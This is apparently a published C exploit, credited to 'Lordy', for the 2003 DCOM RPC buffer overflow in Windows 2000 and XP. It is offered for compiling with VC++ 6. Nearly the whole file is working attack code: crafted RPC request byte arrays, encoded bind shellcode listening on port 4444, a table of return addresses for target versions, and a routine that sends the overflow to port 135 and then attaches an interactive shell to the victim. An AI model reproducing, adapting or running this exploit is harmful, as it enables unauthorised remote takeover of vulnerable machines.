Dcom RPC remote win32 exploit, ported to Windows for compilation with VC++ 6. Uses "magic keys" to find the offset. Ported by Lordy
132c24caa22412268215f455fb5e2eb14b4e96dd8f2b7f5f467245ef0395479e
/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
** 2003/12/14 - PORT TO WIN32 COMPILERS
**
** Added Universal Offsets for Win2k and WinXP
**
**
** Lordy´s Version - ICQ(7557843)
** Lordillusions Company(C)
**
**
** Should work fine with VC++ 6
*/
#include <process.h>
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
//#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <lm.h>
#include <string.h>
#define RECVTIMEOUT 1
char *optarg = NULL;
int optind = 1;
int opterr = 1;
#define _next_char(string) (char)(*(string+1))
int getopt(int argc, char *argv[], char *opstring)
{
static char *pIndexPosition = NULL;
char *pArgString = NULL;
char *pOptString;
if (pIndexPosition != NULL)
{
if (*(++pIndexPosition))
{
pArgString = pIndexPosition;
}
}
if (pArgString == NULL)
{
if (optind >= argc)
{
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* used up all command-line arguments */
}
pArgString = argv[optind++]; /* set this to the next argument ptr */
if (('/' != *pArgString) && ('-' != *pArgString))
{
--optind; /* point to current arg once we're done */
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* used up all the command-line flags */
}
if ((strcmp(pArgString, "-") == 0) || (strcmp(pArgString, "--") == 0))
{
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* encountered the special flag */
}
pArgString++; ; /* look past the / or - */
}
if (':' == *pArgString)
{ ;
return (opterr ? (int)'?' : (int)':');
}
else if ((pOptString = strchr(opstring, *pArgString)) == 0)
{
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return (opterr ? (int)'?' : (int)*pArgString);
}
else
{
if (':' == _next_char(pOptString))
{
if ('\0' != _next_char(pArgString)) optarg = &pArgString[1];
else
{
if (optind < argc) optarg = argv[optind++];
else
{
optarg = NULL;
return (opterr ? (int)'?' : (int)*pArgString);
}
}
pIndexPosition = NULL; /* not in the middle of anything */
}
else
{
optarg = NULL; /* no argument follows the option */
pIndexPosition = pArgString; /* point to the letter we're on */
}
return (int)*pArgString; /* return the letter that matched */
}
}
void bzero(b, length)
/* [<][>][^][v][top][bottom][index][help] */
char *b;
int length;
{
memset(b,0,length);
/* if you have problems finding memset, the following will work:
instead of the above
char *s_ptr;
s_ptr=b;
while(length-- > 0) *s_ptr++ = '\0';
*/
}
/***************************************************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
u_char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
u_char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char request2[]=
{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
u_char request3[]=
{
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
0x63,0x00,0x00,0x00
};
u_char request4[]=
{
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char shellcode[]=
{
/* port 4444 bind shellcode */
0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
struct os_plat_pk
{
int op_pk_num;
char *op_pk_str;
u_long retloc_jmp_esp;
};
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{5,"[Win2k Universal]", 0x0018759F },
{6,"[WinXP Universal]", 0x0100139d },
{0x82,NULL,0}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();
int main(int argc, char *argv[])
{
int sock,type_def=(0),r_r1,r_r2,whgl;
u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
char def_host[(DEF_SZ)]=(DEF_STR);
//Lordy UP
unsigned short port_connect = 135;
unsigned short port_back = 4444;
(void)pri_banrl();
while((whgl=getopt(argc,argv,"T:t:H:h:P:p:B:b:I:i"))!=EOF)
{
switch(whgl)
{
case 'T':
case 't':
if((type_def=atoi(optarg))>6)
{
(void)pri_usg(argv[0]);
}
else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
break;
case 'H':
case 'h':
memset((char *)def_host,0,sizeof(def_host));
strncpy(def_host,optarg,sizeof(def_host)-1);
break;
case 'P':
case 'p':
port_connect=atoi(optarg);
break;
case 'B':
case 'b':
port_back=atoi(optarg);
break;
case 'I':
case 'i':
(void)pri_usg(argv[0]);
break;
case '?':
(void)pri_usg(argv[0]);
break;
}
}
if(strstr(def_host,(DEF_STR)))
{
(void)pri_usg(argv[0]);
}
fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
fprintf(stdout," [0] Add return address.\n");
memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
fprintf(stdout," [1] Start, shellcode setting.\n");
memcpy((u_char *)atk_bf,request1,sizeof(request1));
r_r1=sizeof(request1);
r_r2=sizeof(shellcode)/2;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT(request2,0,r_r2);
QIK_SHIFT(request2,8,r_r2);
memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
r_r1+=sizeof(request2);
memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
r_r1+=sizeof(shellcode);
memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
r_r1+=sizeof(request3);
memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
r_r1+=sizeof(request4);
r_r2=sizeof(shellcode)-12;
QIK_SHIFT(atk_bf,8,r_r2);
QIK_SHIFT(atk_bf,16,r_r2);
QIK_SHIFT(atk_bf,128,r_r2);
QIK_SHIFT(atk_bf,132,r_r2);
QIK_SHIFT(atk_bf,180,r_r2);
QIK_SHIFT(atk_bf,184,r_r2);
QIK_SHIFT(atk_bf,208,r_r2);
QIK_SHIFT(atk_bf,396,r_r2);
fprintf(stdout," [2] Trying %s:%i ...\n",def_host,port_connect);
sock=(int)sexsock(def_host,port_connect);
(void)re_connt_lm(sock);
fprintf(stdout," [3] Connected to %s:%i.\n",def_host,port_connect);
send(sock,bindstr,sizeof(bindstr),0);
recv(sock,get_bf,sizeof(get_bf),0);
fprintf(stdout," [4] Send, attack code.\n");
send(sock,atk_bf,r_r1,0);
close(sock);
fprintf(stdout," [5] OK, Trying %s:%i ...\n",def_host,port_back);
fprintf(stdout," [*] Waiting, cmd shell ");
fflush(stdout);
Sleep(1);
fprintf(stdout,".");
fflush(stdout);
Sleep(1);
fprintf(stdout,".");
fflush(stdout);
Sleep(1);
fprintf(stdout,".\n");
sock=(int)sexsock(def_host,port_back);
(void)re_connt_lm(sock);
(void)start_shell(sock);
exit(0);
}
int sexsock(char *conn_host_nm,int conn_port_nm)
{
WSADATA wsdata;
int sock;
unsigned long ip;
struct sockaddr_in sxp_addr;
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return(-1);
}
//printf("[+] Initialize WSAStartup - OK\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
perror(" [-] socket() error");
return(-1);
}
//printf("[*] Socket initialized - OK\n");
ip=gimmeip(conn_host_nm);
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons((SHORT)conn_port_nm);
sxp_addr.sin_addr.s_addr=ip;
bzero(&(sxp_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
void start_shell(int sock){
int l;
char buf[1000];
struct timeval time;
unsigned long ul[2];
time.tv_sec=RECVTIMEOUT;
time.tv_usec=0;
while (1) {
ul[0]=1;
ul[1]=sock;
l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=write(1,buf,l);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
else {
l=read(0,buf,sizeof(buf));
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=send(sock,buf,l,0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
}
}
void re_connt_lm(int st_sock_va)
{
if(st_sock_va==-1)
{
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
}
void pri_usg(char *f_nm)
{
int r_rn=0;
fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -p [port to connect] - port to connect in the target, default 135.\n");
fprintf(stdout,"\t -b [port to connect back] - port to bind the shell, default 4444.\n");
fprintf(stdout,"\t -t [number] - select target number.\n\n");
fprintf(stdout," Select target number>\n\n");
for(;;)
{
if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
break;
else
{
fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
}
r_rn++;
}
fprintf(stdout,"\n Exmaple> %s -h 192.168.0.1 -t3 -p135 -b3333\n\n",f_nm);
exit(0);
}
void pri_banrl()
{
fprintf(stdout,"\n DCOM RPC WIN32 remote exploit by Lordy - Lordillusions Company(C)\n(Most languages)\n\n");
}
/* eox */